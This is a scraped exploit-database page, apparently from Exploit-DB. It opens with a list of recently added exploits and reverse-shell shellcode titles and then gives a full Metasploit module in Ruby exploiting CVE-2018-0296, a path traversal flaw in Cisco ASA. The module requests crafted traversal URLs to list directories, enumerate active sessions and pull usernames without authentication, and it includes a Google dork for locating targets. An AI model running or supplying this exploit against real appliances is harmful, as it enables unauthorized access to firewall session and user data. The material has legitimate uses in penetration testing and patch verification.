
17 changes to exploits/shellcodes VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow Linux - Use-After-Free Reads in show_numa_stats() WebKit - UXSS via XSLT and Nested Document Replacements Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit) Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal (Metasploit) UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion osTicket 1.12 - Persistent Cross-Site Scripting via File Upload osTicket 1.12 - Formula Injection osTicket 1.12 - Persistent Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
115 lines
No EOL
3.8 KiB
Ruby
Executable file
115 lines
No EOL
3.8 KiB
Ruby
Executable file
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "Cisco Adaptive Security Appliance - Path Traversal",
|
|
'Description' => %q{
|
|
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
|
|
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
|
|
Google Dork:inurl:+CSCOE+/logon.html
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Yassine Aboukir', #Initial discovery
|
|
'Angelo Ruwantha @h3llwings' #msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
['EDB', '44956'],
|
|
['URL', 'https://www.exploit-db.com/exploits/44956/']
|
|
],
|
|
'Arch' => ARCH_CMD,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd'
|
|
},
|
|
'Platform' => ['unix','linux'],
|
|
'Targets' =>
|
|
[
|
|
['3000 Series Industrial Security Appliance (ISA)
|
|
ASA 1000V Cloud Firewall
|
|
ASA 5500 Series Adaptive Security Appliances
|
|
ASA 5500-X Series Next-Generation Firewalls
|
|
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
|
|
Adaptive Security Virtual Appliance (ASAv)
|
|
Firepower 2100 Series Security Appliance
|
|
Firepower 4100 Series Security Appliance
|
|
Firepower 9300 ASA Security Module
|
|
FTD Virtual (FTDv)', {}]
|
|
],
|
|
'Privileged' => false,
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
|
|
OptString.new('SSL', [true, 'set it as true', 'true']),
|
|
OptString.new('RPORT', [true, '443', '443']),
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def run
|
|
uri = target_uri.path
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
|
|
|
|
})
|
|
|
|
|
|
if res && res.code == 200 && res.body.include?("{'name'")
|
|
print_good("#{peer} is Vulnerable")
|
|
print_status("Directory Index ")
|
|
print_good(res.body)
|
|
res_dir = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
|
|
|
|
})
|
|
res_users = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
|
|
|
|
})
|
|
userIDs=res_users.body.scan(/[0-9]\w+/).flatten
|
|
|
|
print_status("CSCEO Directory ")
|
|
print_good(res_dir.body)
|
|
|
|
print_status("Active Session(s) ")
|
|
print_status(res_users.body)
|
|
x=0
|
|
begin
|
|
print_status("Getting User(s)")
|
|
while (x<=userIDs.length)
|
|
users = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
|
|
|
|
})
|
|
|
|
grab_username=users.body.scan(/user:\w+/)
|
|
nonstr=grab_username
|
|
if (!nonstr.nil? && nonstr!="")
|
|
print_good("#{nonstr}")
|
|
end
|
|
x=x+1
|
|
end
|
|
rescue
|
|
print_status("Complete")
|
|
end
|
|
|
|
|
|
else
|
|
print_error("safe")
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
end |